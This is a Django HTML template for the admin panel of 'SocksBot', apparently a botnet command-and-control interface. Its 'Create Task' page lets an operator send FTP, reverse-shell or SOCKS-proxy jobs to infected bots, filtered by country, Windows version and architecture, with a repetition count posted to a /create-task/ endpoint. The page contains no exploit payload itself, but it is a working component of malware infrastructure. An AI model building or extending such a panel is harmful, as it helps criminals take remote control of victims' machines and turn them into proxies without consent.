<!DOCTYPE html>
<html lang="en">
<head>
    {% load static %}
    <meta charset="utf-8">
    <title>SocksBot - Create Task</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="Adminka">


    
    <link id="bs-css" href="{% static 'task/css/bootstrap-cyborg.min.css' %}" rel="stylesheet">
    <link rel="stylesheet" type="text/css" href="{% static 'table/css/bootstrap-slate.min.css' %}">
    <link href="{% static 'table/css/charisma-app.css' %}" rel="stylesheet">
    <link href='{% static "task/bower_components/fullcalendar/dist/fullcalendar.css" %}' rel='stylesheet'>
    <link href='{% static "task/bower_components/fullcalendar/dist/fullcalendar.print.css" %}' rel='stylesheet' media='print'>
    <link href='{% static "task/bower_components/chosen/chosen.min.css' rel='stylesheet" %}'>
    <link href='{% static "task/bower_components/colorbox/example3/colorbox.css" %}' rel='stylesheet'>
    <link href='{% static "task/bower_components/responsive-tables/responsive-tables.css" %}' rel='stylesheet'>
    <link href='{% static "task/bower_components/bootstrap-tour/build/css/bootstrap-tour.min.css" %}' rel='stylesheet'>
    <link href='{% static "task/css/jquery.noty.css" %}' rel='stylesheet'>
    <link href='{% static "task/css/noty_theme_default.css" %}' rel='stylesheet'>
    <link href='{% static "task/css/elfinder.min.css" %}' rel='stylesheet'>
    <link href='{% static "task/css/elfinder.theme.css" %}' rel='stylesheet'>
    <link href='{% static "task/css/jquery.iphone.toggle.css" %}' rel='stylesheet'>
    <link href='{% static "task/css/uploadify.css" %}' rel='stylesheet'>
    <link href='{% static "task/css/animate.min.css" %}' rel='stylesheet'>

  <link rel="icon" href="favicon.ico" type="image/x-icon">
    <script src="{% static 'task/bower_components/jquery/jquery.min.js' %}"></script>
   
 

</head>

<body>
 
    <div class="navbar navbar-default" role="navigation">

        <div class="navbar-inner">
            <button type="button" class="navbar-toggle pull-left animated flip">
                <span class="sr-only">Toggle navigation</span>
               
            </button>
         

            <div class="btn-group pull-right">
                <button class="btn btn-default dropdown-toggle" data-toggle="dropdown">
                    <i class="glyphicon glyphicon-user"></i><span class="hidden-sm hidden-xs"> admin</span>
                    <span class="caret"></span>
                </button>
                <ul class="dropdown-menu">
                
                    <li class="divider"></li>
                    <li><a onclick="logout()">Logout</a></li>
                </ul>
            </div>
         
            
         

        

        </div>
    </div>
 
<div class="ch-container">
    <div class="row">
        
        
        <div class="col-sm-2 col-lg-2">
            <div class="sidebar-nav">
                <div class="nav-canvas">
                    <div class="nav-sm nav nav-stacked">

                    </div>
                   <ul class="nav nav-pills nav-stacked main-menu">
                        <li class="nav-header">Main</li>
                        <li><a class="ajax-link" href="{% url 'main_page' %}"><i class="glyphicon glyphicon-home"></i><span> Main Page</span></a>
                            <li><a class="ajax-link" href="{% url 'table_page' %}"><i class="glyphicon glyphicon-user"></i><span> Bots</span></a>
                                <li><a class="ajax-link"><i class="glyphicon glyphicon-edit"></i><span> Tasks</span></a>
                        </li>
                                <li><a class="ajax-link" href="{% url 'sessions_page' %}"><i class="glyphicon glyphicon-time"></i><span> Sessions</span></a>
                                    </li>
                                    <li><a class="ajax-link" href="{% url 'settings_page' %}"><i class="glyphicon glyphicon-cog"></i><span> Settings</span></a>
                                    </li>
                        
                </div>
            </div>
        </div>
        </noscript>

        <div id="content" class="col-lg-10 col-sm-10">
          
            <div>
    <ul class="breadcrumb">
        <li>
            <a href="{% url 'main_page' %}">Home</a>
        </li>
        <li>
            <a href="{% url 'admin_table' %}">Task</a>
        </li>
        <li>
            <a href="#">New task</a>
        </li>
    </ul>
</div>
 <div class="row">
    <div class="box col-md-12">
    <div class="box-inner">
    <div class="box-header well" data-original-title="">
        <h2><i class="glyphicon glyphicon-edit icon-white"></i>  New Task</h2>

   
    </div>
    <div class="box-content">
    <div class="alert alert-info"> <a href="http://datatables.net/" target="_blank"></a>

                <i class="
glyphicon glyphicon-question-sign red"></i> <span class="textus">
                Specify the name of the task and geolocation, optionally select a criterion, a specific oc and oc architecture, specify the number of repetitions and click "create".</span>
            </a>
    </div>
 

 
    <table class="table table-striped table-bordered bootstrap-datatable datatable responsive">
    <thead>
    <tr>
   
    
     
    
    </tbody>
    </table>
    <div class="task">
<div class="inputs">
<input type="text"  placeholder ="Task name " class="boxi" name="name" id="name" required> 
<input type="text"  placeholder ="Countries ( * for all )" class="boxim" name="" id="country">
</div>



<div class="cheesers">

   <div class="cheks">
      <article class="feature1">
    <input type="checkbox" onclick="document.getElementById('feature2').checked = false; document.getElementById('feature3').checked = false;" id="feature1"/>
    <div>
      <span>
       FTP
       
      </span>
    </div>
  </article>
  
  <article class="feature2">
    <input type="checkbox" onclick="document.getElementById('feature1').checked = false; document.getElementById('feature3').checked = false;" id="feature2"/>
    <div>
      <span>
      Reverse shell
      </span>
    </div>
  </article>
  
  <article class="feature3">
    <input type="checkbox" onclick="document.getElementById('feature2').checked = false; document.getElementById('feature1').checked = false;" id="feature3"/>
    <div>
      <span>
       Socks
      </span>
    </div>
  </article>
  </div>
</div>
<div class="forms">

    <form>
    
    <h2 class="nadpis"> WIN OS </h2>
    
    <div class="checkbox-block">
 <input class="custom-checkbox" onclick="

    document.getElementById('get-up-6').checked = false;
    document.getElementById('make-bed-6').checked = false;
    document.getElementById('clean-teeth-6').checked = false;
    document.getElementById('get-up-1').checked = false;
    document.getElementById('dget-up-7').checked = false;

    document.getElementById('get-up-h1').checked = false;
    document.getElementById('make-bedros-1').checked = false;

    " id="dget-up-6" type="checkbox" value="dget-up-6" name="dget-up-6"/>
    <label for="dget-up-6"> <span class="texto">ALL WIN</span></label>
      <!--checkbox 1-->
    <input class="custom-checkbox" id="get-up-6" onclick="


    document.getElementById('dget-up-6').checked = false;

    " type="checkbox" value="get-up-6" name="get-up-6"/>
    <label for="get-up-6"> <span class="texto">Windows7</span></label>
    
    <!--checkbox 2-->
    <input class="custom-checkbox" id="make-bed-6" onclick="

    document.getElementById('dget-up-6').checked = false;

    " type="checkbox" value="make-bed-6" name="make-bed-6"/>
    <label for="make-bed-6"> <span class="texto">Windows8</span></label>
    
    <!--checkbox 3-->
    <input class="custom-checkbox" id="clean-teeth-6" onclick="



        document.getElementById('dget-up-6').checked = false;


    " type="checkbox" value="clean-teeth-6" name="clean-teeth-6"/>
    <label for="clean-teeth-6"> <span class="texto">Windows8.1</span></label>
 

    
    </div>
  </form>

<form>
    
  
    
    <div class="checkbox-block">
    
      <!--checkbox 1-->
    <input class="custom-checkbox" onclick="


        document.getElementById('dget-up-6').checked = false;


    " id="get-up-1" type="checkbox" value="get-up-1" name="get-up-1"/>
    <label for="get-up-1"> <span class="texto">Windows 10/11</span></label>
    
    <!--checkbox 2-->
    
    <!--checkbox 3-->
  
    
    <!--checkbox 4-->

      
    </div>

  </form>


<form>
    
  
    
    <div class="checkbox-block">
      <!--checkbox 1-->
    <input class="custom-checkbox" onclick="    

    document.getElementById('dget-up-6').checked = false;
    "
      id="get-up-h1" type="checkbox" value="get-up-h1" name="get-up-h1"/>
    <label for="get-up-h1"> <span class="texto">Windows Server 2016/2019 </span></label>
    

    
 
    
    <!--checkbox 4-->

      
    </div>

  </form>


<form>
    
  
    
    <div class="checkbox-block">


  <input class="custom-checkbox" onclick="    

    document.getElementById('dget-up-6').checked = false;
 "
      id="make-bedros-1" type="checkbox" value="make-bedros-1" name="make-bedros-1"/>
    <label for="make-bedros-1"> <span class="texto">Windows Server 2012 </span></label>

      
    </div>

  </form>
  <form>
    
  
    
    <div class="checkbox-block">


  <input class="custom-checkbox" onclick="    

    document.getElementById('dget-up-6').checked = false;
 "
      id="dget-up-7" type="checkbox" value="make-bedros-1" name="make-bedros-1"/>
    <label for="dget-up-7"> <span class="texto">Windows Server 2012 R2 </span></label>

      
    </div>

  </form>

  <form>
    
    <h2 class="nadpis">Architecture</h2>
    
    <div class="checkbox-block">
      
      <!--checkbox 1-->
    <input class="custom-checkbox" id="get-up-11" type="checkbox" onclick="document.getElementById('make-bed-11').checked = false; document.getElementById('clean-teeth-11').checked = false;" value="get-up-1" name="get-up-1">
    <label for="get-up-11"> <span class="texto">64x &amp; 32x</span></label>
    
    <!--checkbox 2-->
    <input class="custom-checkbox" id="make-bed-11" onclick="document.getElementById('get-up-11').checked = false" type="checkbox" value="make-bed-1" name="make-bed-1">
    <label for="make-bed-11"> <span class="texto">32x</span></label>
    
    <!--checkbox 3-->
    <input class="custom-checkbox" id="clean-teeth-11" onclick="document.getElementById('get-up-11').checked = false" type="checkbox" value="clean-teeth-1" name="clean-teeth-1">
    <label for="clean-teeth-11"> <span class="texto">64x</span></label>
    
    <!--checkbox 4-->

      
    </div>
  </form>


<div class="task">
        <div id="errore-input" class="erro" style="display: none;"><a class="baton"  onclick="(document.getElementById('errore-input').style.display='none')">x</a>
    <p class="textus" id="error_text"> The input value should not be empty.</p>
</div>

<div class="posledn">

<form class="gehueu">
            <p>
                <label for="age"> Repetitions: </label>
                <input class="dobus" type="text" step="1" min="1" max="10010" value="1" id="age" name="age"/>
            </p>
          
        </form>
  
 
  <button onclick="create_task()" class ="button-hover">
      <span> Create </span>
    </button>
</div>
</div>
    </div>


    </div>

    </div>
    <!--/span-->

    </div><!--/row-->

<style type="text/css">
    .dobus{
        padding-right: 5px;  padding-left: 5px;
        width: 94px;
    }
    .posledn {
            margin-left: 8%;
    }

    .erro {
    background-color: #1f1f1f;
    width: 390
px
;
    margin-left: 0%;
    border-radius: 7
px
;
    border: 2
px
 solid #b51f28;
 margin-top: 20px;
  margin-bottom: 20px;


}

.cheesers {
    margin-left: 32.5%;
}


article {
    width: 123px;
}

</style>
    
<style type="text/css">
    .rfjd{
background-color: red;
    }
</style>


<script src="{% static 'task/bower_components/bootstrap/dist/js/bootstrap.min.js' %}"></script>
<script src="{% static 'task/js/jquery.cookie.js' %}"></script>
<script src="{% static 'task/bower_components/moment/min/moment.min.js' %}"></script>
<script src="{% static 'task/bower_components/fullcalendar/dist/fullcalendar.min.js' %}"></script>
<script src="{% static 'task/js/jquery.dataTables.min.js' %}"></script>
<script src="{% static 'task/bower_components/chosen/chosen.jquery.min.js' %}"></script>
<script src="{% static 'task/bower_components/colorbox/jquery.colorbox-min.js' %}"></script>
<script src="{% static 'task/js/jquery.noty.js' %}"></script>
<script src="{% static 'task/bower_components/responsive-tables/responsive-tables.js' %}"></script>
<script src="{% static 'task/bower_components/bootstrap-tour/build/js/bootstrap-tour.min.js' %}"></script>
<script src="{% static 'task/js/jquery.raty.min.js' %}"></script>
<script src="{% static 'task/js/jquery.iphone.toggle.js' %}"></script>
<script src="{% static 'task/js/jquery.autogrow-textarea.js' %}"></script>
<script src="{% static 'task/js/jquery.uploadify-3.1.min.js' %}"></script>
<script src="{% static 'task/js/jquery.history.js' %}"></script>
<script src="{% static 'task/js/charisma.js' %}"></script>


<script src="https://cdnjs.cloudflare.com/ajax/libs/Chart.js/3.6.0/chart.min.js"></script>
<script type="text/javascript">

    function create_task() {

        ftp = document.getElementById('feature1').checked
        shell = document.getElementById('feature2').checked
        sock = document.getElementById('feature3').checked

        name = document.getElementById('name').value;
        country = document.getElementById('country').value;

        

        reps = document.getElementById('age').value;

        if (ftp == true) {
            _type = 'FTP'
        } else if(shell == true){
            _type = 'Reverse shell'
        } else if (sock == true){
            _type = 'Socks'
        }

        all_win = document.getElementById('dget-up-6').checked
        win7 = document.getElementById('get-up-6').checked
        win8 = document.getElementById('make-bed-6').checked
        win10 = document.getElementById('get-up-1').checked
        win81 = document.getElementById('clean-teeth-6').checked

        serv2016_19 = document.getElementById('get-up-h1').checked
        serv2012 = document.getElementById('make-bedros-1').checked
        serv2012r2 = document.getElementById('dget-up-7').checked

        console.log(serv2012r2)

        x32_64 = document.getElementById('get-up-11').checked
        x32 = document.getElementById('make-bed-11').checked
        x64 = document.getElementById('clean-teeth-11').checked

        if (name == '' || country == '' || (ftp == false && shell == false && sock == false) || (all_win == false && serv2012 == false && serv2016_19 == false && win7 == false && win8 == false && win81 == false && win10 == false && serv2012r2 == false)) {
            document.getElementById('errore-input').style.display = ''
            return
        }
        

        $.ajax({
            url: '/create-task/', 
            type: 'post',
            data: {reps: reps, type: _type, name: name, country: country, all_win: all_win, win7: win7, win8: win8, win10_11: win10,  win81: win81, x32_64: x32_64, x32: x32, x64: x64, serv2016_19: serv2016_19, serv2012: serv2012, serv2012r2: serv2012r2},
            dataType: 'html',
            success: function(data){
                window.location.href = '/tasks/'
            }
        })
    }


$('.dobus').on("input",function(ev){

    el = document.getElementById('age')
    var symbs = el.value.split('')

    flag = false

    if (symbs[0] == '0') {
        el.value = ''
    }

    symbs.forEach(function(item, i, symbs){
                    if (flag == false && (testStr(item) == true || item == '-'  || item == ' ')) {
                        el.value = symbs.slice(0, i).join('')
                        flag = true;
                    }
                })



});

function testStr(str)
{
    if ( !/^[a-zA-ZА-яЁё!@#$%^&*()_+\=\[\]{};':"\\|,.<>\/?.`~]+$/.test(str) ) return false;
    return true;
}


    function logout() {
        $.ajax({
            url: '/logout/',
            type: 'get',
            data: {},
            dataType: 'html',
            success: function(data){
                const json = data
                const response = JSON.parse(json);
                if (response.v == '200') {
                    window.location.href = '/login/'
                }
            }

        })
    }

   var ctx = document.getElementById('myChart').getContext('2d');
var myChart = new Chart(ctx, {
    type: 'doughnut',
    data: { 
        labels: ['Win7', 'Winxp', 'Win8', 'Win10', 'Win11'],
        datasets: [{
            data: [27.92, 17.53, 14.94, 26.62, 12.99],
            backgroundColor: ['#b31a4e', '#00ae59', '#dc3906', '#0a599f', '#dbb700'],
            borderWidth: 0.5 ,
            borderColor: '#ddd'
        }]
    },
    options: {
        title: {
            display: true,
            text: 'Recommended Daily Diet',
            position: 'top',
            fontSize: 16,
            fontColor: '#111',
            padding: 20
        },
        legend: {
            display: true,
            position: 'bottom',
            labels: {
                boxWidth: 20,
                fontColor: '#111',
                padding: 15
            }
        },
        tooltips: {
            enabled: false
        },
        plugins: {
            datalabels: {
                color: '#111',
                textAlign: 'center',
                font: {
                    lineHeight: 1.6
                },
                formatter: function(value, ctx) {
                    return ctx.chart.data.labels[ctx.dataIndex] + '\n' + value ;
                }
            }
        }
    }
});

      
    </script>
   <script type="text/javascript">// Получение ссылки на элемент canvas в DOM
const $grafica = document.querySelector("#grafica");
// Tags - это метки, которые идут по оси X.  
const tags = ["32x", "64x"]
// У нас может быть несколько наборов данных. Давайте начнем с одного
const dataSales2020 = {
    label: "X OC",
    data: [10,14], // Данные представляют собой массив, который должен иметь такое же количество значений, как и количество тегов.
    backgroundColor: 'rgba(164, 67, 162, 0.2)', // Цвет фона
    borderColor: 'rgba(222, 11, 218, 1)', // Цвет границ
    borderWidth: 1,// Толщина границ
};
new Chart($grafica, {
    type: 'bar',// Тип графики - изменяем тип здесь.
    data: {
        labels: tags,
        datasets: [
            dataSales2020,
            // Больше данных ...
        ]
    },
    options: {
        scales: {
            yAxes: [{
                ticks: {
                    beginAtZero: true
                }
            }],
        },
    }
});</script>
</body>
</html>
